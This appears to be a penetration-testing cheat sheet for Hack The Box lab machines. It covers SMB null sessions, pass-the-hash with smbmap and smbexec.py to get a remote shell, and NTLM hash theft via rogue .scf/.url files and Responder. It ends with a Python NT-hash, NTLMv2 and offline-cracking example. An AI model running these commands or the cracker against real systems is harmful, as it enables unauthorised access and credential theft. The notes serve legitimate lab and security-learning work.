SMB
Null Session
smbmap:
smbmap -H querier.htb -u anonymous -d localhost
Use the -R flag to recursively list everything.
smbclient:
smbclient -L //querier.htb -N
Forward slashes avoid shell escaping of the UNC path. -N (--no-pass) skips the password prompt; pressing Enter or typing any password at the prompt also works for a null session.
Pass The Hash
NTLM challenge-response authentication never sends the password. The client proves possession of the user's NT hash (MD4 of the UTF-16LE password) by keying an HMAC over the server's challenge, and the server checks it against its own stored copy of the same hash. Any tool that can feed the raw hash into that computation can therefore authenticate as the user, without knowing or cracking the password, to any service that accepts NTLM.
smbmap to enumerate an SMB share with a hash instead of a password (the value is LMHASH:NTHASH):
smbmap -u USERNAME -p 0B186E661BBDBDCF6047784DE8B9FD8B:0B186E661BBDBDCF6047784DE8B9FD8B -H HOST
Note: if you only have the NT hash, repeat it in both halves as above, or put the empty-LM constant aad3b435b51404eeaad3b435b51404ee in the first half. The LM half is ignored by modern targets, so its value does not matter.
Execute commands over SMB (requires local administrator rights on the target: smbexec.py creates a service through the Service Control Manager and reads the command output back over a share):
smbexec.py jeeves/Administrator@jeeves.htb -hashes "aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00" -shell-type "powershell"
NTLM Hash Theft
If you have write access to a share that users browse, drop a file there whose icon or target points to a UNC path on your host (an .scf or .url file, for example). When a user opens the folder in Explorer, Windows automatically tries to authenticate to your SMB server, and a listener such as Responder captures the user's NetNTLMv2 response. What you capture is a challenge-response, not the NT hash itself: it can be cracked offline (hashcat mode 5600) or relayed with ntlmrelayx where SMB signing is not enforced, but it cannot be used directly for pass-the-hash.
TODO: Link main article in post exploitation
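The two points above, that pass-the-hash needs only the NT hash and that a rogue share yields a challenge-response rather than the hash, shown end to end. This is an added example and not code from the original page or from any of the tools it lists: it implements the NT hash and NTLMv2 proof computation as specified in MS-NLMP, with a pure-Python MD4 fallback for builds where OpenSSL disables MD4, and the user name, domain, password, server challenge, blob and wordlist are constructed values, with the blob shorter than a real one.

```python
import hashlib
import hmac
import struct
from typing import Iterable, Optional


def _md4_pure(data: bytes) -> bytes:
    """Minimal MD4 (RFC 1320), used when hashlib cannot provide it."""
    mask = 0xFFFFFFFF
    F = lambda x, y, z: (x & y) | (~x & mask & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    rotl = lambda x, n: ((x << n) | (x >> (32 - n))) & mask

    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)          # bit length, little-endian

    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for k in range(0, 16, 4):                    # round 1
            a = rotl((a + F(b, c, d) + X[k]) & mask, 3)
            d = rotl((d + F(a, b, c) + X[k + 1]) & mask, 7)
            c = rotl((c + F(d, a, b) + X[k + 2]) & mask, 11)
            b = rotl((b + F(c, d, a) + X[k + 3]) & mask, 19)
        for k in range(4):                           # round 2
            a = rotl((a + G(b, c, d) + X[k] + 0x5A827999) & mask, 3)
            d = rotl((d + G(a, b, c) + X[k + 4] + 0x5A827999) & mask, 5)
            c = rotl((c + G(d, a, b) + X[k + 8] + 0x5A827999) & mask, 9)
            b = rotl((b + G(c, d, a) + X[k + 12] + 0x5A827999) & mask, 13)
        for k in (0, 2, 1, 3):                       # round 3
            a = rotl((a + H(b, c, d) + X[k] + 0x6ED9EBA1) & mask, 3)
            d = rotl((d + H(a, b, c) + X[k + 8] + 0x6ED9EBA1) & mask, 9)
            c = rotl((c + H(d, a, b) + X[k + 4] + 0x6ED9EBA1) & mask, 11)
            b = rotl((b + H(c, d, a) + X[k + 12] + 0x6ED9EBA1) & mask, 15)
        a, b, c, d = (a + aa) & mask, (b + bb) & mask, (c + cc) & mask, (d + dd) & mask
    return struct.pack("<4I", a, b, c, d)


def md4(data: bytes) -> bytes:
    try:
        return hashlib.new("md4", data).digest()
    except ValueError:      # e.g. OpenSSL 3 without the legacy provider
        return _md4_pure(data)


def nt_hash(password: str) -> bytes:
    """NT hash = MD4(UTF-16LE(password)); the NT half that PTH tools take."""
    return md4(password.encode("utf-16le"))


def ntlmv2_response(nt: bytes, user: str, domain: str, challenge: bytes, blob: bytes) -> bytes:
    """NTProofStr for NTLMv2. Takes the NT hash, never the password."""
    ntlmv2_key = hmac.new(nt, (user.upper() + domain).encode("utf-16le"), "md5").digest()
    return hmac.new(ntlmv2_key, challenge + blob, "md5").digest()


def netntlmv2_line(user: str, domain: str, challenge: bytes, proof: bytes, blob: bytes) -> str:
    """Responder-style capture line, the format hashcat mode 5600 consumes."""
    return f"{user}::{domain}:{challenge.hex()}:{proof.hex()}:{blob.hex()}"


def crack_netntlmv2(line: str, wordlist: Iterable[str]) -> Optional[str]:
    """Offline guess: recompute the proof per candidate password and compare."""
    user, _, domain, chal, proof, blob = line.split(":")
    for candidate in wordlist:
        got = ntlmv2_response(nt_hash(candidate), user, domain, bytes.fromhex(chal), bytes.fromhex(blob))
        if hmac.compare_digest(got, bytes.fromhex(proof)):
            return candidate
    return None


def demo() -> dict:
    # Constructed values; no real account, capture or network traffic is involved.
    user, domain, password = "alice", "CORP", "Winter2019!"
    challenge = bytes.fromhex("1122334455667788")                         # 8-byte server challenge
    blob = bytes.fromhex("0101000000000000a0f4e7d2b5c6a40100000000")      # truncated NTLMv2 blob

    # Server side: the target stores only the NT hash and derives the expected proof from it.
    nt = nt_hash(password)
    expected = ntlmv2_response(nt, user, domain, challenge, blob)

    # Pass-the-hash client: holds a dumped NT hash, never learns the password, still matches.
    pth_proof = ntlmv2_response(nt, user, domain, challenge, blob)

    # Hash theft: a rogue share captures (challenge, proof, blob), not the NT hash, so the only
    # route to reusable credentials is guessing passwords offline.
    line = netntlmv2_line(user, domain, challenge, expected, blob)
    cracked = crack_netntlmv2(line, ["Summer2019!", "Password1", "Winter2019!"])
    return {"nt_hash": nt.hex(), "pth_matches_server": pth_proof == expected,
            "line": line, "cracked": cracked}


if __name__ == "__main__":
    print(demo())
```

The server-side and pass-the-hash branches call the same function with the same NT hash, which is the whole reason the hash is as good as the password for NTLM. The capture line, by contrast, only lets you re-run that computation against guesses, which is why a NetNTLMv2 capture goes to hashcat or a relay rather than to smbmap's -p.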